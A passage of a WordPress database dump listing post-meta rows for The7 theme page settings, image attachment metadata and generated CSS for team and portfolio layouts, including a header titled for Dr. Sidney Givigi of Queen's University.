(15308,2862,'_dt_fancy_header_subtitle',''),
(15309,2862,'_dt_fancy_header_subtitle_font_size','18'),
(15310,2862,'_dt_fancy_header_subtitle_line_height','26'),
(15311,2862,'_dt_fancy_header_subtitle_text_transform','none'),
(15312,2862,'_dt_fancy_header_subtitle_color_mode','color'),
(15313,2862,'_dt_fancy_header_subtitle_color','#ffffff'),
(15314,2862,'_dt_fancy_header_bg_heading',''),
(15315,2862,'_dt_fancy_header_bg_color','#222222'),
(15316,2862,'_dt_fancy_header_bg_image_origin','custom'),
(15317,2862,'_dt_fancy_header_bg_image','a:0:{}'),
(15318,2862,'_dt_fancy_header_bg_repeat','no-repeat'),
(15319,2862,'_dt_fancy_header_bg_position_x','center'),
(15320,2862,'_dt_fancy_header_bg_position_y','center'),
(15321,2862,'_dt_fancy_header_bg_fullscreen','1'),
(15322,2862,'_dt_fancy_header_bg_overlay','0'),
(15323,2862,'_dt_fancy_header_overlay_color','#000'),
(15324,2862,'_dt_fancy_header_bg_overlay_opacity','50'),
(15325,2862,'_dt_fancy_header_scroll_effect','default'),
(15326,2862,'_dt_fancy_header_bg_parallax','0.5'),
(15327,2862,'_dt_fancy_header_responsiveness_heading',''),
(15328,2862,'_dt_fancy_header_responsiveness','enabled'),
(15329,2862,'_dt_fancy_header_responsiveness_switch','778px'),
(15330,2862,'_dt_fancy_header_responsive_height','70'),
(15331,2862,'_dt_fancy_header_responsive_font_size','30'),
(15332,2862,'_dt_fancy_header_responsive_title_line_height','38'),
(15333,2862,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(15334,2862,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(15335,2862,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(15336,2862,'_dt_teammate_options_go_to_single','1'),
(15337,2862,'_dt_teammate_options_position',''),
(15338,2862,'_dt_teammate_options_website',''),
(15339,2862,'_dt_teammate_options_mail',''),
(15340,2862,'_dt_teammate_options_facebook',''),
(15341,2862,'_dt_teammate_options_twitter',''),
(15342,2862,'_dt_teammate_options_dribbble',''),
(15343,2862,'_dt_teammate_options_you-tube',''),
(15344,2862,'_dt_teammate_options_rss',''),
(15345,2862,'_dt_teammate_options_delicious',''),
(15346,2862,'_dt_teammate_options_flickr',''),
(15347,2862,'_dt_teammate_options_lastfm',''),
(15348,2862,'_dt_teammate_options_linkedin',''),
(15349,2862,'_dt_teammate_options_vimeo',''),
(15350,2862,'_dt_teammate_options_tumbler',''),
(15351,2862,'_dt_teammate_options_pinterest',''),
(15352,2862,'_dt_teammate_options_devian',''),
(15353,2862,'_dt_teammate_options_skype',''),
(15354,2862,'_dt_teammate_options_github',''),
(15355,2862,'_dt_teammate_options_instagram',''),
(15356,2862,'_dt_teammate_options_stumbleupon',''),
(15357,2862,'_dt_teammate_options_behance',''),
(15358,2862,'_dt_teammate_options_px-500',''),
(15359,2862,'_dt_teammate_options_tripedvisor',''),
(15360,2862,'_dt_teammate_options_vk',''),
(15361,2862,'_dt_teammate_options_foursquare',''),
(15362,2862,'_dt_teammate_options_xing',''),
(15363,2862,'_dt_teammate_options_weibo',''),
(15364,2862,'_dt_teammate_options_odnoklassniki',''),
(15365,2862,'_dt_teammate_options_research-gate',''),
(15366,2862,'_dt_teammate_options_yelp',''),
(15367,2862,'_dt_teammate_options_blogger',''),
(15368,2862,'_dt_teammate_options_soundcloud',''),
(15369,2862,'_dt_teammate_options_viber',''),
(15370,2862,'_dt_teammate_options_whatsapp',''),
(15371,2862,'_dt_teammate_options_reddit',''),
(15372,2862,'_dt_teammate_options_snapchat',''),
(15373,2862,'_dt_teammate_options_telegram',''),
(15374,2862,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(15375,2864,'_edit_lock','1665787063:1'),
(15376,2865,'_wp_attached_file','2022/10/w162.jpg'),
(15377,2865,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:164;s:6:\"height\";i:200;s:4:\"file\";s:16:\"2022/10/w162.jpg\";s:8:\"filesize\";i:47116;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"w162-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5922;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(15378,2864,'_thumbnail_id','2865'),
(15379,2864,'_edit_last','1'),
(15380,2864,'_dt_sidebar_position','disabled'),
(15381,2864,'_dt_sidebar_widgetarea_id','sidebar_1'),
(15382,2864,'_dt_sidebar_hide_on_mobile','0'),
(15383,2864,'_dt_footer_show','1'),
(15384,2864,'_dt_footer_widgetarea_id','sidebar_2'),
(15385,2864,'_dt_footer_hide_on_mobile','0'),
(15386,2864,'_dt_header_title','fancy'),
(15387,2864,'_dt_header_background','normal'),
(15388,2864,'_dt_header_background_below_slideshow','disabled'),
(15389,2864,'_dt_header_transparent_bg_color_scheme','light'),
(15390,2864,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(15391,2864,'_dt_header_transparent_top_bar_bg_opacity','25'),
(15392,2864,'_dt_header_transparent_bg_color','#000000'),
(15393,2864,'_dt_header_transparent_bg_opacity','50'),
(15394,2864,'_dt_header_disabled_background','normal'),
(15395,2864,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(15396,2864,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(15397,2864,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(15398,2864,'_dt_header_disabled_transparent_bg_color','#000000'),
(15399,2864,'_dt_header_disabled_transparent_bg_opacity','50'),
(15400,2864,'_dt_page_overrides_top_margin',''),
(15401,2864,'_dt_page_overrides_right_margin',''),
(15402,2864,'_dt_page_overrides_bottom_margin',''),
(15403,2864,'_dt_page_overrides_left_margin',''),
(15404,2864,'_dt_mobile_page_padding_top',''),
(15405,2864,'_dt_mobile_page_padding_right',''),
(15406,2864,'_dt_mobile_page_padding_bottom',''),
(15407,2864,'_dt_mobile_page_padding_left',''),
(15408,2864,'_dt_fancy_header_layout_heading',''),
(15409,2864,'_dt_fancy_header_title_aligment','center'),
(15410,2864,'_dt_fancy_header_height','300'),
(15411,2864,'_dt_fancy_header_padding-top','0px'),
(15412,2864,'_dt_fancy_header_padding-bottom','0px'),
(15413,2864,'_dt_fancy_header_breadcrumbs_heading',''),
(15414,2864,'_dt_fancy_header_breadcrumbs','disabled'),
(15415,2864,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(15416,2864,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(15417,2864,'_dt_fancy_header_title_heading',''),
(15418,2864,'_dt_fancy_header_title_mode','custom'),
(15419,2864,'_dt_fancy_header_title','Dr. Sidney Givigi Queen’s University Canada'),
(15420,2864,'_dt_fancy_header_title_font_size','30'),
(15421,2864,'_dt_fancy_header_title_line_height','36'),
(15422,2864,'_dt_fancy_header_text_transform','none'),
(15423,2864,'_dt_fancy_header_title_color_mode','color'),
(15424,2864,'_dt_fancy_header_title_color','#ffffff'),
(15425,2864,'_dt_fancy_header_subtitle_heading',''),
(15426,2864,'_dt_fancy_header_subtitle',''),
(15427,2864,'_dt_fancy_header_subtitle_font_size','18'),
(15428,2864,'_dt_fancy_header_subtitle_line_height','26'),
(15429,2864,'_dt_fancy_header_subtitle_text_transform','none'),
(15430,2864,'_dt_fancy_header_subtitle_color_mode','color'),
(15431,2864,'_dt_fancy_header_subtitle_color','#ffffff'),
(15432,2864,'_dt_fancy_header_bg_heading',''),
(15433,2864,'_dt_fancy_header_bg_color','#222222'),
(15434,2864,'_dt_fancy_header_bg_image_origin','custom'),
(15435,2864,'_dt_fancy_header_bg_image','a:0:{}'),
(15436,2864,'_dt_fancy_header_bg_repeat','no-repeat'),
(15437,2864,'_dt_fancy_header_bg_position_x','center'),
(15438,2864,'_dt_fancy_header_bg_position_y','center'),
(15439,2864,'_dt_fancy_header_bg_fullscreen','1'),
(15440,2864,'_dt_fancy_header_bg_overlay','0'),
(15441,2864,'_dt_fancy_header_overlay_color','#000'),
(15442,2864,'_dt_fancy_header_bg_overlay_opacity','50'),
(15443,2864,'_dt_fancy_header_scroll_effect','default'),
(15444,2864,'_dt_fancy_header_bg_parallax','0.5'),
(15445,2864,'_dt_fancy_header_responsiveness_heading',''),
(15446,2864,'_dt_fancy_header_responsiveness','enabled'),
(15447,2864,'_dt_fancy_header_responsiveness_switch','778px'),
(15448,2864,'_dt_fancy_header_responsive_height','70'),
(15449,2864,'_dt_fancy_header_responsive_font_size','30'),
(15450,2864,'_dt_fancy_header_responsive_title_line_height','38'),
(15451,2864,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(15452,2864,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(15453,2864,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(15454,2864,'_dt_teammate_options_go_to_single','1'),
(15455,2864,'_dt_teammate_options_position',''),
(15456,2864,'_dt_teammate_options_website',''),
(15457,2864,'_dt_teammate_options_mail',''),
(15458,2864,'_dt_teammate_options_facebook',''),
(15459,2864,'_dt_teammate_options_twitter',''),
(15460,2864,'_dt_teammate_options_dribbble',''),
(15461,2864,'_dt_teammate_options_you-tube',''),
(15462,2864,'_dt_teammate_options_rss',''),
(15463,2864,'_dt_teammate_options_delicious',''),
(15464,2864,'_dt_teammate_options_flickr',''),
(15465,2864,'_dt_teammate_options_lastfm',''),
(15466,2864,'_dt_teammate_options_linkedin',''),
(15467,2864,'_dt_teammate_options_vimeo',''),
(15468,2864,'_dt_teammate_options_tumbler',''),
(15469,2864,'_dt_teammate_options_pinterest',''),
(15470,2864,'_dt_teammate_options_devian',''),
(15471,2864,'_dt_teammate_options_skype',''),
(15472,2864,'_dt_teammate_options_github',''),
(15473,2864,'_dt_teammate_options_instagram',''),
(15474,2864,'_dt_teammate_options_stumbleupon',''),
(15475,2864,'_dt_teammate_options_behance',''),
(15476,2864,'_dt_teammate_options_px-500',''),
(15477,2864,'_dt_teammate_options_tripedvisor',''),
(15478,2864,'_dt_teammate_options_vk',''),
(15479,2864,'_dt_teammate_options_foursquare',''),
(15480,2864,'_dt_teammate_options_xing',''),
(15481,2864,'_dt_teammate_options_weibo',''),
(15482,2864,'_dt_teammate_options_odnoklassniki',''),
(15483,2864,'_dt_teammate_options_research-gate',''),
(15484,2864,'_dt_teammate_options_yelp',''),
(15485,2864,'_dt_teammate_options_blogger',''),
(15486,2864,'_dt_teammate_options_soundcloud',''),
(15487,2864,'_dt_teammate_options_viber',''),
(15488,2864,'_dt_teammate_options_whatsapp',''),
(15489,2864,'_dt_teammate_options_reddit',''),
(15490,2864,'_dt_teammate_options_snapchat',''),
(15491,2864,'_dt_teammate_options_telegram',''),
(15492,2864,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(15493,2862,'rs_page_bg_color',''),
(15494,2864,'rs_page_bg_color',''),
(15495,2856,'the7_shortcodes_dynamic_css','a:2:{s:32:\"efcce7075c0b06c95a285b2a7c8763fd\";s:6509:\".dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd  .team-media {\n  padding: 5px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-efcce7075c0b06c95a285b2a7c8763fd.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  